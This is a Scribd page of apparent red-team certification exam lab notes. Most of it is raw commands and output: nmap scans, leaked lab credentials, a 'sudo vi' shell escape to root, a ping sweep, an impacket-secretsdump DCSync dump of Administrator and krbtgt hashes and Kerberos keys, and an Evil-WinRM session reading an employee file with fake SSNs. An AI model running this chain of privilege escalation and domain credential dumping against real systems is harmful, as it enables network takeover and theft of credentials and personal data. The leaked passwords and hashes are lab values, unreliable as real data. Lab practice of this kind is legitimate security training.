[go: up one dir, main page]
Scribd
Upload
2K views6 pages

CRTAEXAMWRITEUP

The document contains the results of an Nmap scan on multiple IP addresses, revealing various open ports and services, including SSH and HTTP servers. It also includes sensitive information such as user credentials, Active Directory sync service details, and employee data in XML format. Additionally, there are indications of potential security vulnerabilities and access to critical system information.

Uploaded by

dzero1539
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
2K views6 pages

CRTAEXAMWRITEUP

The document contains the results of an Nmap scan on multiple IP addresses, revealing various open ports and services, including SSH and HTTP servers. It also includes sensitive information such as user credentials, Active Directory sync service details, and employee data in XML format. Additionally, there are indications of potential security vulnerabilities and access to critical system information.

Uploaded by

dzero1539
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd

172.26.10.

1
[Link]

┌──(kali㉿kali)-[~]
└─$ nmap -sV [Link]
Starting Nmap 7.95 ( [Link] ) at 2025-09-24 20:02 EDT
Nmap scan report for [Link]
Host is up (0.18s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Unbound
80/tcp open http nginx

PORT STATE SERVICE VERSION


22/tcp open ssh OpenSSH 9.6p1 Ubuntu 3ubuntu13.11 (Ubuntu Linux;
protocol 2.0)
| ssh-hostkey:
| 256 [Link] (ECDSA)
|_ 256 [Link] (ED25519)
3389/tcp filtered ms-wbt-server
8091/tcp open http [Link] Express framework
|_http-title: HotHost
23100/tcp open http Werkzeug httpd 3.1.3 (Python 3.9.22)
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
|_http-server-header: Werkzeug/3.1.3 Python/3.9.22
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at


[Link] .
Nmap done: 1 IP address (1 host up) scanned in 2075.63 seconds

view-source:[Link]

app-admin:x:1000:1000:@dmin@123:/home/app-admin:/bin/bash
priv
sudo vi -c ':!/bin/sh' /dev/null
# ls
[Link] process
# cat [Link]
{
"users": [
{
"id": "07643590-1aea-4de3-91ec-8881600cc54c",
"username": "admin",
"password": "665a26fad71ea9ef3edf5f33195d4b31",
"createdAt": "Mon May 12 2025"
}
],
"monitoringData": [],
"httpMonitoringData": [],
"settings": {
"RAM_THRESHOLD": 90,
"RAM_STABILIZATION_LEVEL": 3,
"DISK_THRESHOLD": 90,
"DISK_STABILIZATION_LEVEL": 1,
"HOST_IS_DOWN_CONFIRMATIONS": 1,
"HTTP_ISSUE_CONFIRMATION": 1,
"DAYS_FOR_SSL_EXPIRED": 14,
"HOURS_FOR_NEXT_ALERT": 12
},
"pluginSettings": []
}# pwd
/www/hothostdata
#

root@app-server:~/hot/server/frontend/src# cat [Link]


/* WARNING: This is a dummy CSS file with fake credentials - DO NOT USE IN
PRODUCTION! */
.login-form {
background-color: #f0f0f0;
padding: 20px;
}

/* Fake credentials (for testing only) */

#username::placeholder { content: "admin"; }


#password::placeholder { content: "P@ssw0rd123!"; } /* Change to
Very3stroungPassword */
/* API keys (example only - never store real keys in CSS!) */

.api-key-example {
--stripe-key: "pk_test_51FakeKey1234567890abc";
--aws-key: "AKIAIOSFODNN7EXAMPLE";
}

/* Database connection (mock) */

.db-connection {
/* host:port */

--db-url: "jdbc:mysql://[Link]:3306";
--db-user: "db_admin";
--db-pass: "DB_P@ssw0rd!";
}

[Link]
cat /var/log/[Link]

for i in $(seq 1 254); do


ip="10.10.10.$i"
ping -c 1 -W 1 $ip > /dev/null && echo "$ip is up"
done

[Link] is up
[Link] is up
[Link] is up

===================================================================================
===================================================================================
======================================
Internal Access
===================================================================================
===================================================================================
======================================
Nmap scan report for [Link]
Host is up (0.30s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Unbound
80/tcp open http nginx
|_http-title: pfSense - Login
===================================================================================
===================================================================================
======================================

===================================================================================
===================================================================================
======================================
Nmap scan report for [Link]
Host is up (0.35s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.58 ((Ubuntu))
|_http-server-header: Apache/2.4.58 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
3389/tcp filtered ms-wbt-server
4369/tcp open epmd Erlang Port Mapper Daemon
| epmd-info:
| epmd_port: 4369
|_ nodes:
===================================================================================
===================================================================================
======================================

Nmap scan report for [Link]


Host is up (0.46s latency).
Not shown: 65508 closed tcp ports (reset)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-09-
25 [Link]Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain:
ent.corp0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain:
ent.corp0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3389/tcp filtered ms-wbt-server
5357/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Service Unavailable
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
57018/tcp open msrpc Microsoft Windows RPC
60920/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
60921/tcp open msrpc Microsoft Windows RPC
60924/tcp open msrpc Microsoft Windows RPC
60931/tcp open msrpc Microsoft Windows RPC
60945/tcp open msrpc Microsoft Windows RPC
Service Info: Host: ENT-DC; OS: Windows; CPE: cpe:/o:microsoft:windows

===================================================================================
===================================================================================
======================================

[Link]

#Active Directory Sync Service Credentials:

Purpose: Password synchronization between on-prem AD and cloud services (Azure AD


Connect).
Service Account: sync_user@[Link]
Password: Summer@2025

#Security Notes:
Syncs password hashes to Azure AD (if hybrid environment).
Critical: Restrict to least privilege (e.g., deny interactive login).

creds
username -> sync_user@[Link]
password -> Summer@2025
===================================================================================
===================================================================================
======================================

┌──(kali㉿kali)-[~/Desktop]
└─$ impacket-secretsdump ent/sync_user:'Summer@2025'@[Link]
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied


[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get [Link] secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:3d15cb1141d579823f8bb08f1f23e316
:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c0[Link]
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:36405f88da713c31bbff52e57aea[Link]
[Link]\
sync_user:1103:aad3b435b51404eeaad3b435b51404ee:e58b89915ba50f299b4bb1032589[Link]
ENT-DC$:1000:aad3b435b51404eeaad3b435b51404ee:29086549a2f67233ccf3f447256f[Link]
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-
96:992f0f89c2eec235f94d01103043a3626f1a54e5adc45280ebe58d0883dc294e
Administrator:aes128-cts-hmac-sha1-96:c3c88d0395d8c7e93039108279fa3cb9
Administrator:des-cbc-md5:ad9de62585018c5b
krbtgt:aes256-cts-hmac-sha1-
96:1b161ecb048ed49498658525fea07d4278aeab4c8d60ee32e6a61392d14ec924
krbtgt:aes128-cts-hmac-sha1-96:61a3167db44973b38e6ea0ddb9f3f07d
krbtgt:des-cbc-md5:37ad9e49e3ea0b52
[Link]\sync_user:aes256-cts-hmac-sha1-
96:73ae7f5121e08ef5224bf82c941db87bf14ce5bf0bc3c0805b95485885db511f
[Link]\sync_user:aes128-cts-hmac-sha1-96:72f6b128b62adb5cf0347e8655f41afc
[Link]\sync_user:des-cbc-md5:377615f8b9106445
ENT-DC$:aes256-cts-hmac-sha1-
96:467c04090e14f145e83e442c21fc2066c67e84433d0bad40ff6104ba032333b5
ENT-DC$:aes128-cts-hmac-sha1-96:732407b10baf81e379c7c2f6b8ae8a3b
ENT-DC$:des-cbc-md5:3446e6cd9e8015ba
[*] Cleaning up...

┌──(kali㉿kali)-[~/Desktop]

*Evil-WinRM* PS C:\Users\Administrator\Desktop> type [Link]


<?xml version="1.0" encoding="UTF-8"?>
<Employees>
<!-- PROTECTED: Contains sensitive employee information - RESTRICT ACCESS -->
<Employee security-clearance="confidential">
<ID>E-4281</ID>
<FullName>Christopher A. Whitaker</FullName>
<GovernmentID type="SSN">550-12-8421</GovernmentID>
<Position>Lead Security Architect</Position>
<Compensation>
<BaseSalary currency="USD">142000</BaseSalary>
<Bonus eligibility="true">15000</Bonus>
</Compensation>
<AccessCredentials>
<SSHKeys>
<RSA-4096>
<Fingerprint>SHA256:zT4Gp2K9...V3jH91</Fingerprint>
<PublicKey>ssh-rsa AAAAB3Nza...9Px8= secure-shell@corp</PublicKey>
<LastRotated>2024-03-15T[Link]Z</LastRotated>
</RSA-4096>
</SSHKeys>
<LastMultiFactorAuth>2024-05-20T[Link]Z</LastMultiFactorAuth>
</AccessCredentials>
</Employee>

<Employee security-clearance="restricted">
<ID>E-9173</ID>
<FullName>Danielle M. Chen</FullName>
<GovernmentID type="SSN">367-88-4102</GovernmentID>
<Position>Director of Engineering</Position>
<Compensation>
<BaseSalary currency="USD">189500</BaseSalary>
<Equity>2500</Equity>
</Compensation>
<AccessCredentials>
<SSHKeys>
<Ed25519>
<Fingerprint>SHA256:7bNq1Rc...YtF62</Fingerprint>
<PublicKey>ssh-ed25519 AAAAC3N...Vdv2= admin-access@corp</PublicKey>
</Ed25519>
</SSHKeys>
</AccessCredentials>
</Employee>
</Employees>
*Evil-WinRM* PS C:\Users\Administrator\Desktop>

You might also like